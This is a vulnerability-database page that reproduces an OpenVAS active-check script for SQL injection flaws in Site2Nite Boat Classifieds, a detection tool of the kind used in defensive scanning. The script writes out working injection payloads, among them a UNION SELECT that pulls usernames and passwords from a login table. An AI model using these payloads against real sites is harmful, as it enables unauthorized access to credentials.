Lucene search
+L

Site2Nite Boat Classifieds Multiple SQLi Vulnerabilities - Active Check

🗓️ 16 Jul 2010 00:00:00Reported by Copyright (C) 2010 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 20 Views

Site2Nite Boat Classifieds SQLi Vulnerabilitie

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-2687
22 Jun 201000:00
circl
circl
Circl
CVE-2010-2688
22 Jun 201000:00
circl
cve
CVE
CVE-2010-2687
9 Jul 201019:00
cve
cve
CVE
CVE-2010-2688
9 Jul 201019:00
cve
cvelist
Cvelist
CVE-2010-2687
9 Jul 201019:00
cvelist
cvelist
Cvelist
CVE-2010-2688
9 Jul 201019:00
cvelist
exploitdb
Exploit DB
Boat Classifieds - SQL Injection
22 Jun 201000:00
exploitdb
exploitdb
Exploit DB
Boat Classifieds - 'printdetail.asp?Id' SQL Injection
23 Jun 201000:00
exploitdb
euvd
EUVD
EUVD-2010-2691
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2010-2692
7 Oct 202500:30
euvd
Rows per page
# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.801378");
  script_version("2024-06-13T05:05:46+0000");
  script_tag(name:"last_modification", value:"2024-06-13 05:05:46 +0000 (Thu, 13 Jun 2024)");
  script_tag(name:"creation_date", value:"2010-07-16 19:44:55 +0200 (Fri, 16 Jul 2010)");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");

  script_cve_id("CVE-2010-2687", "CVE-2010-2688");

  script_tag(name:"qod_type", value:"remote_app");

  script_tag(name:"solution_type", value:"WillNotFix");

  script_name("Site2Nite Boat Classifieds Multiple SQLi Vulnerabilities - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2010 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl",
                      "DDI_Directory_Scanner.nasl", "global_settings.nasl",
                      "gb_microsoft_iis_http_detect.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"summary", value:"Site2Nite Boat Classifieds is prone to multiple SQL injection
  (SQLi) vulnerabilities.");

  script_tag(name:"vuldetect", value:"Sends multiple HTTP GET requests and checks the responses.");

  script_tag(name:"insight", value:"The flaws are caused by improper validation of user-supplied
  input via the 'id' parameter in 'detail.asp' and 'printdetail.asp' that allows attackers to
  manipulate SQL queries by injecting arbitrary SQL code.");

  script_tag(name:"impact", value:"Successful exploitation will let attackers to gain unauthorized
  access and obtain sensitive information.");

  script_tag(name:"solution", value:"No known solution was made available for at least one year
  since the disclosure of this vulnerability. Likely none will be provided anymore. General solution
  options are to upgrade to a newer release, disable respective features, remove the product or
  replace the product by another one.");

  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/13990/");
  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/13995/");
  script_xref(name:"URL", value:"http://www.vupen.com/english/advisories/2010/1576");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("list_array_func.inc");
include("port_service_func.inc");

port = http_get_port( default:80 );

if( ! http_can_host_asp( port:port ) )
  exit( 0 );

foreach dir( make_list_unique( "/boat-webdesign", "/products/boat-webdesign/www", http_cgi_dirs( port:port ) ) ) {

  if( dir == "/" )
    dir = "";

  res = http_get_cache( port:port, item:dir + "/details.asp" );
  if( res =~ "^HTTP/1\.[01] 200" ) {
    url = dir + '/detail.asp?ID=999999 union select 1,2,3,4,5,username,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74 from tbllogin "having 1=1--"';

    req = http_get( item:url, port:port );
    res = http_keepalive_send_recv( port:port,data:req );

    if( '/boat-webdesign/' >< res && ( "DELETE" >< res || "SELECT" >< res ) ) {
      report = http_report_vuln_url( port:port, url:url );
      security_message( port:port, data:report );
      exit( 0 );
    }
  }

  res = http_get_cache( port:port, item:dir + "/printdetails.asp" );
  if( res =~ "^HTTP/1\.[01] 200" ) {
    url = dir + '/printdetail.asp?Id=661 and 1=1';

    req = http_get( item:url, port:port );
    res = http_keepalive_send_recv( port:port,data:req );

    if( '>BOAT DETAILS - Site Id' >< res && ">Seller Information:<" >< res ) {
      report = http_report_vuln_url( port:port, url:url );
      security_message( port:port, data:report );
      exit( 0 );
    }
  }
}

exit( 99 );

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Jun 2024 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 27.5
EPSS0.01189
20